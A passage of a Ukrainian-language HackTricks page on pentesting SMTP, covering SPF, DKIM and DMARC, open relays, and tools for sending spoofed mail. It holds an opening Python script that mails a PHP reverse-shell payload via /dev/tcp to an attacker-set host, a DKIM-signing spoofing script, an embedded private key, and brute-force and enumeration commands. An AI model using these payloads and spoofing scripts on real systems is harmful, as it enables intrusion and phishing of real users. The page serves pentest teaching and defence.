lhost = “127.0.0.1” lport = 443 rhost = “192.168.1.1” rport = 25 # 489,587

create message object instance

msg = MIMEMultipart()

setup the parameters of the message

password = “” msg[‘From’] = “attacker@local” msg[‘To’] = “victim@local” msg[‘Subject’] = “This is not a drill!”

payload

message = (“& /dev/tcp/%s/%d 0>&1'); ?>” % (lhost,lport))

print(“[*] Payload is generated : %s” % message)

msg.attach(MIMEText(message, ‘plain’)) server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250: print(“[-]Connection Error”) exit()

server.starttls()

Uncomment if log-in with authencation

server.login(msg[‘From’], password)

server.sendmail(msg[‘From’], msg[‘To’], msg.as_string()) server.quit()

print(“[***]successfully sent email to %s:” % (msg[‘To’]))

</details>

## SMTP Smuggling

Уразливість SMTP Smuggling дозволяла обійти всі SMTP protections (див. наступний розділ для детальнішої інформації про protections). Для додаткової інформації про SMTP Smuggling дивіться:


<a class="content_ref" href="smtp-smuggling.md"><span class="content_ref_label">SMTP Smuggling</span></a>

## Контрзаходи проти Mail Spoofing

Організації запобігають несанкціонованій відправці електронних листів від їх імені за допомогою **SPF**, **DKIM** та **DMARC** через простоту підробки SMTP-повідомлень.

Повний посібник з цими контрзаходами доступний за адресою [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

> [!CAUTION]
> SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Це означає, що замість створення **TXT record** у `_spf.domain.com` ви створюєте його в `domain.com`, використовуючи **той самий синтаксис**.\
> Крім того, щоб повторно використовувати попередні spf записи, досить часто можна знайти щось на кшталт `"v=spf1 include:_spf.google.com ~all"`

**Sender Policy Framework** (SPF) — механізм, що дозволяє Mail Transfer Agents (MTAs) перевіряти, чи має хост право відправляти листи від імені домену, запитуючи список авторизованих поштових серверів, визначених організаціями. Цей список, який вказує IP-адреси/діапазони, домени та інші сутності, **уповноважені надсилати email від імені доменного імені**, включає різні "**Mechanisms**" у SPF-записі.

#### Механізми

З [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Завжди збігається; використовується для результату за замовчуванням, наприклад `-all` для всіх IP, які не збігаються з попередніми механізмами.                                                                                                                                                                                          |
| A         | Збігається, якщо DNS-запис адреси (A або AAAA) для доменного імені можна розв'язати у адресу відправника.                                                                                                                                                                                                                          |
| IP4       | Збігається, якщо відправник належить вказаному діапазону IPv4-адрес.                                                                                                                                                                                                                                                                |
| IP6       | Збігається, якщо відправник належить вказаному діапазону IPv6-адрес.                                                                                                                                                                                                                                                               |
| MX        | Збігається, якщо домен має MX-запис, що розв'язується у адресу відправника (тобто пошта надходить з одного з вхідних поштових серверів домену).                                                                                                                                                                                    |
| PTR       | Збігається, якщо доменне ім'я (PTR-запис) для адреси клієнта знаходиться в зазначеному домені і це доменне ім'я розв'язується у адресу клієнта (forward-confirmed reverse DNS). Цей механізм не рекомендується і його слід уникати, якщо це можливо.                                                                                   |
| EXISTS    | Збігається, якщо вказане доменне ім'я розв'язується в будь-яку адресу (незалежно від того, в яку саме адресу). Використовується рідко. Разом зі SPF macro language дає змогу виконувати складніші збіги, наприклад DNSBL-запити.                                                                                                      |
| INCLUDE   | Посилається на політику іншого домену. Якщо політика того домену PASS, то цей механізм вважається пройденим. Однак, якщо включена політика FAIL, обробка триває. Щоб повністю делегувати політику іншого домену, потрібно використовувати розширення redirect.                                                                            |
| REDIRECT  | <p>Redirect — це вказівка на інший домен, який містить SPF-політику; дозволяє кільком доменам ділити одну SPF-політику. Це корисно при роботі з великою кількістю доменів, що використовують ту саму email-інфраструктуру.</p><p>SPF-політика домену, вказаного в механізмі redirect, буде використана.</p> |

Також можливо визначити **Qualifiers**, які вказують, **що слід робити, якщо механізм збігається**. За замовчуванням використовується **кваліфікатор "+"** (тому якщо будь-який механізм збігається, це означає, що це дозволено).\
Зазвичай наприкінці кожної SPF-політики ви побачите щось на кшталт: **\~all** або **-all**. Це використовується для вказівки того, що **якщо відправник не відповідає жодній SPF-політиці, слід позначити лист як недовірений (\~) або відхилити (-) лист.**

#### Кваліфікатори

Кожен механізм у політиці може бути префіксований одним з чотирьох кваліфікаторів для визначення очікуваного результату:

- **`+`**: Відповідає результату PASS. За замовчуванням механізми припускають цей кваліфікатор, отже `+mx` еквівалентно `mx`.
- **`?`**: Представляє NEUTRAL, трактований подібно до NONE (жодної спеціальної політики).
- **`~`**: Позначає SOFTFAIL, слугує проміжним результатом між NEUTRAL та FAIL. Листи з таким результатом зазвичай приймаються, але позначаються відповідно.
- **`-`**: Вказує FAIL, тобто лист має бути відхилений.

У наступному прикладі ілюструється **SPF policy of google.com**. Зверніть увагу на включення SPF-політик з різних доменів всередині першої SPF-політики:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Раніше було можливо сфальсифікувати будь-який домен, який не мав коректного або жодного запису SPF. Зараз, якщо email надходить з домену без дійсного запису SPF, він, ймовірно, буде автоматично відхилений/позначений як ненадійний.

To check the SPF of a domain you can use online tools like: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

DKIM використовується для підписування вихідних email, що дозволяє їх перевіряти зовнішнім Mail Transfer Agents (MTAs) шляхом отримання публічного ключа домену з DNS. Цей публічний ключ знаходиться в TXT record домену. Щоб отримати цей ключ, потрібно знати і selector, і ім’я домену.

Наприклад, для запиту ключа необхідні ім’я домену та selector. Їх можна знайти в заголовку листа DKIM-Signature, наприклад d=gmail.com;s=20120113.

Команда для отримання цієї інформації може виглядати так:

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Domain-based Message Authentication, Reporting & Conformance)

DMARC підвищує безпеку електронної пошти, будуючись на протоколах SPF та DKIM. Він визначає політики, які підказують поштовим серверам, як обробляти листи від конкретного домену, зокрема як поводитись при невдачах автентифікації та куди надсилати звіти про дії з обробки пошти.

Щоб отримати запис DMARC, потрібно виконати запит до піддомену _dmarc

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

DMARC теги

Що щодо піддоменів?

З here.
Вам потрібно мати окремі SPF-записи для кожного піддомену, з якого ви бажаєте відправляти пошту.
Наведене нижче було спочатку опубліковано на openspf.org, який раніше був чудовим ресурсом для такого роду інформації.

The Demon Question: What about subdomains?

If I get mail from pielovers.demon.co.uk, and there’s no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn’t make sense for Demon’s policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.

So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.

Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: * IN TXT “v=spf1 -all”

Це має сенс — піддомен може знаходитись у зовсім іншому географічному регіоні і мати дуже відмінне визначення SPF.

Open Relay

Коли надсилаються електронні листи, важливо забезпечити, щоб вони не позначалися як спам. Часто цього досягають за допомогою relay server, trusted by the recipient. Однак поширена проблема полягає в тому, що адміністратори можуть не повністю розуміти, які саме IP ranges are safe to allow. Це непорозуміння може призвести до помилок у налаштуванні SMTP сервера — ризик, що часто виявляють під час security assessments.

Обхідний шлях, який деякі адміністратори використовують, щоб уникнути проблем з доставкою пошти, особливо при спілкуванні з potential or ongoing clients, — це allow connections from any IP address. Для цього конфігурують параметр mynetworks SMTP сервера так, щоб він приймав всі IP-адреси, як показано нижче:

mynetworks = 0.0.0.0/0

Для перевірки, чи є поштовий сервер open relay (тобто чи може він пересилати листи з будь-якого зовнішнього джерела), зазвичай використовують інструмент nmap. Він містить спеціальний скрипт для цього. Команда для виконання детального (verbose) сканування сервера (наприклад, з IP 10.10.10.10) на порту 25 за допомогою nmap виглядає так:

nmap -p 25 --script smtp-open-relay -Pn -vv 10.10.10.10

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Інструменти

• https://github.com/serain/mailspoof Перевірка неправильних конфігурацій SPF та DMARC
• https://pypi.org/project/checkdmarc/ Автоматичне отримання конфігурацій SPF та DMARC

Відправити Spoof Email

• https://www.mailsploit.com/index
• http://www.anonymailer.net/
• https://emkei.cz/

Або ви можете скористатися інструментом:

• https://github.com/magichk/magicspoofing

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

Warning

Якщо ви отримуєте будь-яку помилку при парсингу ключа бібліотекою dkim для Python, не соромтеся використовувати наступний.
ПРИМІТКА: Це лише грубий фікс для швидкої перевірки у випадках, коли з якоїсь причини приватний ключ openssl не може бути розпарсений dkim.

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

Або ви можете зробити це вручну:

# This will send an unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

Детальніше

Дізнайтеся більше про ці засоби захисту на https://seanthegeek.net/459/demystifying-dmarc/

Інші індикатори фішингу

• Вік домену
• Посилання, які ведуть на IP-адреси
• Техніки маніпуляції посиланнями
• Підозрілі (нетипові) вкладення
• Пошкоджений вміст електронного листа
• Значення, які відрізняються від значень у заголовках листа
• Наявність дійсного та довіреного SSL-сертифіката
• Надсилання сторінки на сайти фільтрації веб-контенту

Екфільтрація через SMTP

Якщо ви можете відправляти дані через SMTP read this.

Файл конфігурації

Postfix

Зазвичай, якщо встановлено, файл /etc/postfix/master.cf містить скрипти для виконання, наприклад коли користувач отримує нове повідомлення. Наприклад рядок flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} означає, що /etc/postfix/filtering буде виконано, якщо користувач mark отримає нове повідомлення.

Інші конфігураційні файли:

sendmail.cf
submit.cf

Посилання

• https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
• https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM
• https://21ad.netlify.app/blogs/the-silent-inbox-how-verified-emails-slip-past-email-security-gateways/

Автоматичні команди HackTricks

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.